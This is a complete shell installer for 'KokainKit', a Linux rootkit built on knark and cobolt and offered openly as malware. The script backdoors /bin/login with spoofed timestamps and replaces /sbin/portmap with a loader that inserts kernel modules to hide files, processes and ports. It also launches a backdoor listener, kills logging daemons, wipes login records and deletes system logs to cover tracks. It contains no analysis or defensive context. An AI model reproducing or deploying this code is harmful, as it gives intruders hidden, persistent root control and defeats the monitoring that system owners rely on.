#!/bin/sh # KokainKit v1.6 by deka # - # A rootkit based on knark and cobolt. # Do not Distribute! # - TORNDIR=/usr/src/.puta THEPASS=$1 DITTPORT=$2 THEDIR=/usr/lib/$THEPASS echo "---------------------------------------" echo " KokainKit v1.6 by dekah&self" echo "---------------------------------------" echo "" echo "Using magic word $THEPASS and dittrichport $DITTPORT." echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)" if ! test "$(whoami)" = "root"; then echo " - UID0 check failed" echo "" sleep 3 echo "FATAL: You're not root" exit 1 fi if test -d "$TORNDIR"; then echo " - T0rnKit found. Screwing it up" killall -9 in.inetd killall -9 t0rntd echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash echo "" > /usr/sbin/in.inetd echo "ap" > $TORNDIR/.1file echo "255.255" > $TORNDIR/.1addr echo "255.255" > $TORNDIR/.1logz echo "ap" > $TORNDIR/.1proc fi if ! test -d "/usr/include"; then echo " - /usr/include does not exist, making it (ugly)..." mkdir /usr/include fi if ! test -d "/usr/include/pwdb"; then echo " - /usr/include/pwdb does not exist, making it (ugly)..." mkdir /usr/include/pwdb fi mkdir $THEDIR if test -d "$THEDIR"; then echo " - Secret dir created" else echo " - MkDir failed" echo "" echo "FATAL: Unable to create the secret directory" exit 1 fi cd src echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h echo "#define MAGIC_DIR \"$THEDIR\"" >> kokain.h gcc -O2 cobolt.c -o cobolt if test -r "./cobolt"; then echo " - Cobolt compiled" else echo " - gcc failed" echo "" cd .. sleep 3 echo "FATAL: Unable to compile Cobolt" exit 1 fi touch -acmr /bin/login cobolt cp /bin/login $THEDIR/login1 cp cobolt $THEDIR/login2 echo " - Cobolt installed" gcc -O2 autoexec.c -o autoexec if test -r "./autoexec"; then echo " - AutoExec compiled" else echo " - gcc failed" echo "" cd .. echo "FATAL: Unable to compile AutoExec" exit 1 fi touch -acmr /sbin/portmap autoexec cp /sbin/portmap $THEDIR/portmap rm -f /sbin/portmap cp autoexec /sbin/portmap echo "#!/bin/sh" > $THEDIR/autoexec echo " - AutoExec installed" cd .. killall -9 syslogd klogd ./wipe u root >/dev/null 2>&1 rm -f /var/log/messages /var/log/secure cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1 cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1 cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1 cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1 echo " - Logs cleaned" #echo "" > /etc/hosts.allow #echo "" > /etc/hosts.deny #echo " - Hosts.deny/Hosts.allow cleaned" echo " - Patching dittrich..." ./bpatch ./dittrich __PATCHPort__ $DITTPORT cat <> $THEDIR/.bashrc alias ls="ls --color -alF" alias dir="dir --color" export PS1="\u@\h:\w# " export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff cd E0F echo " - .bashrc created" cp -R dittrich stuff $THEDIR echo " - Stuff installed" mkdir $THEDIR/knrk cd knark make >/dev/null 2>&1 echo " - Knark compiled" cd .. rm -rf knark/knrksrc knark/Makefile cp -R knark/* $THEDIR/knrk echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec echo "$THEDIR/dittrich" >> $THEDIR/autoexec echo "killall -31 dittrich" >> $THEDIR/autoexec /sbin/portmap >/dev/null 2>&1 echo " - Knark installed" if test -d "/var/named/ADMROCKS"; then rm -rf /var/named/ADMROCKS echo " - AdmRocks erased" fi cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah rm -f /etc/inetd.conf cp /tmp/blahah /etc/inetd.conf rm -f /tmp/blahah echo " - Inetd.conf fixed" PATH=/sbin:$PATH syslogd klogd echo " - Syslogd/Klogd restarted" cd .. rm -rf *kokain* echo " - KokainKit removed" echo "" #echo "--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--" if test -d "/proc/$THEPASS"; then echo "Knark installed successfully." else echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD" cp $THEDIR/login2 /bin/login fi echo "kitinst $THEPASS $DITTPORT" # - EoF - #